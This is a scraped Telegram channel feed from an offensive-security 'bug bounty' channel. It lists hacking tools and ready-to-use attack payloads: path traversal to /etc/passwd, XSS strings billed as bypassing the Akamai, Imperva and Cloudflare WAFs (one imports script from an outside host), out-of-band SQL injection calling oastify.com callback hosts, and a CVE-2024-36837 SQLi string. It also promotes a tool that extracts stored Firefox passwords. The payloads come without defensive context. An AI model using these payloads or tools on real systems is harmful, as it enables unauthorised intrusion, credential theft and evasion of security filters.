BugCod3 – Telegram
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
A quick way to find "all" paths for Next.js websites:

console.log(__BUILD_MANIFEST.sortedPages)

👩‍💻 javascript:
console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

#BugBounty #Tips #JS

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:

%2F..%2F..%2Fetc%2Fpasswd

#XSS #Payload

LazyDork Tool is a Google dorker tool that helps during Google dorking

🔗 Site

#Google #Dork #Maker

XlsNinja: Multi-Vulnerability Scanner

💬
XlsNinja is a powerful and versatile multi-vulnerability scanner designed to detect various web application vulnerabilities, including Local File Inclusion (LFI), Open Redirects (OR), SQL Injection (SQLi), and Cross-Site Scripting (XSS). This tool was created by AnonKryptiQuz, Coffinxp, Hexsh1dow, and Naho.

📊 Features:
⚪️ LFI Scanner: Detect Local File Inclusion vulnerabilities.
⚪️ OR Scanner: Identify Open Redirect vulnerabilities.
⚪️ SQL Scanner: Detect SQL Injection vulnerabilities.
⚪️ XSS Scanner: Identify Cross-Site Scripting vulnerabilities.
⚪️ Multi-threaded scanning: Improved performance through multi-threading.
⚪️ Customizable payloads: Adjust payloads to suit specific targets.
⚪️ Success criteria: Modify success detection criteria for specific use cases.
⚪️ User-friendly command-line interface: Simple and intuitive.
⚪️ Save vulnerable URLs: Option to save the results of vulnerable URLs to a file.

🔼 Installation:
cd lostools
pip install -r requirements.txt
python xlsniNja.py


😸 Github

⬇️ Download
🔒 BugCod3

#Multi #Vulnerability #Scanner

Top 15 Vulnerability Scanners🔍📝

#Top #Vulnerability #Scanners

XSS Bypass Akamai, Imperva and CloudFlare

Payload:
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>

#XSS #Payload

📣 T.me/BugCod3
📣 T.me/Root_Exploit
Add to your wordlist:

auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern


#BugBounty #Tips

WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯

"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">


#BugBounty #Tips #Waf

Out-of-Band SQL Injection

Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\http://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))

'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'http://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))

#BugBounty #Tips #SQL

Extract all endpoints from a JS File and take your bug 🐞

#BugBounty #Tips

Firefox Decrypt

💬
Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox, Waterfox, Thunderbird®, SeaMonkey®) profiles

💻 Usage:
cd firefox_decrypt
python firefox_decrypt.py


Github

⬇️ Download
🔒 BugCod3

#Python #Firefox #Extract #Password #Tools

Finding Hidden Parameter & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss


#BugBounty #Tips

SQLI Injection
CVE: 2024-36837

Payload:
0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 


#BugBounty #Tips

JS Recon for IP, Hostname, URL from Waybackurls + LazyEgg

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg[.]py "{}" --js_urls --domains --ips' > jsurls && cat jsurls | grep '\.' | sort -u


#BugBounty #Tips

XSS in Office.com. The + made a difference.

Payload:
`'>+<noscript>alert()</noscript>`


#BugBounty #Tips #XSS

SubCerts

💬
SubCerts is an automated tool designed to extract subdomains from certificate transparency logs using the crt.sh API. This tool allows security researchers, penetration testers, and developers to identify subdomains of a target domain by leveraging publicly available certificates.

📊 Features:
⚪️ Subdomain Extraction: Utilizes crt.sh, a certificate transparency log search engine, to gather subdomains associated with a target domain.

⚪️ HTTP Probing: Automatically sends HTTP/HTTPS requests to each extracted subdomain using httpx and returns:
⚫️ HTTP status codes
⚫️ Page titles
⚫️ Silent output for clean and organized results

⚪️ Automation: Run the tool with a simple command and get results efficiently without manual effort.

⚪️ Flexible Output: Optionally save the extracted subdomains and httpx results to a file for later review.

🔼 Installation:
cd SubCerts
chmod +x *.sh
./setup.sh
./subcerts.sh -h


💻 Usage:
To run SubCerts for a domain and save the results to a file:
./subcerts.sh -u example.com --output results.txt


😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #SubDomain #certificate

WAF bypass payloads

- Imperva/AWS
<details/open/id="&quot;"ontoggle=[JS]>

- Akamai
<details open id="' &quot;'"ontoggle=[JS]>``

#WAF #Bypass

XSS

Watch out for reflected XSS in the search parameter!

Payload:
"-->""/>Hack by Fagun</noscript><deTailS open x=">" ontoggle=(co\u006efirm)``>"


#XSS #BugBounty #Tips

Export to GBounty

💬
Export to GBounty is a Burp Suite extension developed using the Montoya API. It allows users to export selected HTTP requests from Burp Suite, including the Site Map Tree, Repeater, and Message Editor, into a compressed ZIP file. This ZIP file can be directly used with the GBounty scanner using the command `gbounty -rf requests.zip`, enabling streamlined vulnerability scanning and management.

📊 Features:
⚪️ Effortless Export: Easily export selected HTTP requests from multiple sources within Burp Suite.
⚪️ Compressed Format: Saves requests in a ZIP archive, optimizing storage and transfer.
⚪️ Unique File Naming: Each request is saved as a uniquely named text file within the ZIP to prevent conflicts.
⚪️ Wide Compatibility: Supports exporting from Site Map Tree, Repeater, Message Editor, and other compatible tools.
⚪️ User-Friendly Interface: Adds a context menu option "Export to GBounty" for a seamless user experience.
⚪️ Robust Error Handling: Provides clear notifications regarding the export status, including overwrite confirmations and error messages.

🔼 Installation:
Prerequisites
⚪️ Java Development Kit (JDK): Ensure you have JDK 8 or higher installed.
⚪️ Burp Suite: The extension is compatible with Burp Suite Professional and Burp Suite Community.

💻 Usage:
Select Requests to Export:

Within Burp Suite, select the HTTP requests you wish to export from the Site Map Tree, Repeater, Message Editor, or other supported tools.

📂 Export Requests:
Right-click on the selected requests. Choose the Export to GBounty option from the context menu.

📂 Run GBounty Scanner:
Use the exported ZIP file with the GBounty scanner by executing the following command in your terminal:
gbounty -rf requests.zip


😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #Tips #GBounty

XSS

Bypass #Akamai, #Imperva and #CloudFlare WAF 🧱🔥
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>


#BugBounty #Tips #Bypass
